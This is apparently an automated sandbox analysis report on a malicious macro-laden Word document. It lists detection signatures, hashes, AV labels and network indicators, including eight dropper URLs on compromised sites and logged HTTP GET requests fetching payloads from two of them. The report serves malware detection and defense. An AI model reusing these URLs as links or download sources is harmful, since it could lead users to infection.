Analysis Report v22Pc0qA.doc.part

Overview

General Information

Sample Name:	v22Pc0qA.doc.part (renamed file extension from part to doc)
Analysis ID:	347028
MD5:	7a7d325948481b0557b035249bf5c96a
SHA1:	0529727ffad8388fc94155d1652ca65189cda5df
SHA256:	47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919
Most interesting Screenshot:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops certificate files (DER)

Enables debug privileges

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://hotelshivansh.com/UserFiles/8/	Avira URL Cloud: Label: malware
Source: https://www.isatechnology.com/training/b/	Avira URL Cloud: Label: malware
Source: http://transfersuvan.com/wp-admin/OVl/	Avira URL Cloud: Label: malware
Source: https://physio-svdh.ch/wp-admin/kK/P	Avira URL Cloud: Label: malware
Source: https://b2bcom.com.br/site/0H/	Avira URL Cloud: Label: phishing
Source: https://physio-svdh.ch/wp-admin/kK/	Avira URL Cloud: Label: malware
Source: http://arquivopop.com.br/index_htm_files/Kxh/	Avira URL Cloud: Label: malware
Source: https://cairocad.com/cgi-bin/1PBB/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: v22Pc0qA.doc.doc	Metadefender: Detection: 44%			Perma Link
Source: v22Pc0qA.doc.doc	ReversingLabs: Detection: 86%

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 177.12.163.108:443 -> 192.168.2.22:49173 version: TLS 1.0

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2113923637.00000000028B0000.00000002.00000001.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: physio-svdh.ch

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.209.195.106:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.209.195.106:443

Networking:

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in memory: <img width="120" height="120" src="https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png" class="home__services--icon wp-post-image" alt="" srcset="https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png 120w, https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital.png 437w, https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-100x100.png 100w" sizes="(max-width: 120px) 100vw, 120px" /></a>
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: http://transfersuvan.com/wp-admin/OVl/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: https://physio-svdh.ch/wp-admin/kK/
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /files/b/ HTTP/1.1Host: ownitconsignment.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UserFiles/8/ HTTP/1.1Host: hotelshivansh.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
Source: Joe Sandbox View	ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View	ASN Name: IPV6InternetLtdaBR IPV6InternetLtdaBR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 177.12.163.108:443 -> 192.168.2.22:49173 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{438FF120-FFD8-4816-B513-C2DC6937B540}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /files/b/ HTTP/1.1Host: ownitconsignment.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UserFiles/8/ HTTP/1.1Host: hotelshivansh.comConnection: Keep-Alive

Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: <a class="social__anchor external" href="https://www.facebook.com/b2bcomcomunicacao" title="Facebook"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: <a class="social__anchor external" href="https://www.youtube.com/channel/UCrYEOm4ym22murrhb0WGC2A" title="Youtube"> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: physio-svdh.ch

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Feb 2021 22:18:25 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.4.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp	String found in binary or memory: http://arquivopop.com.br
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.2110705774.0000000000234000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000004.00000003.2106686641.000000001D0B8000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2118830789.000000001B608000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab4
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://hotelshivansh.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: http://ownitconsignment.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0)
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000004.00000002.2112079841.00000000023F0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.2120136620.000000001D2B0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: http://transfersuvan.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: http://transfersuvan.com/wp-admin/OVl/
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000004.00000002.2112079841.00000000023F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleane
Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#about
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#blog
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#clients
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#contact
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#home
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#portfolio
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#services
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/blog
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/blog/empreender-e-sonhar/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/blog/novo-normal-o-papel-do-e-commerce-para-as-novas-empresas/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/blog/sinalizacao-seu-cartao-de-visita/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acm-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acm-3/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acm/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/aco-corten-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/aco-corten/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acrilico-com-iluminacao/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acrilico/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/design-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/design/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/displays-luminosos/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/letra-caixa/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/projeto-persolalizado/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-metronetwork-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-quality-esp-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-ximpressoes-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/trabalho-8-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-btenergia-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-cemundodosaber-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-weissarquitetura-com/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/www-btenergia-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/branding-de-marca/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/comunicacao-visual/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/e-commerce/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/limpeza-de-fachadas/
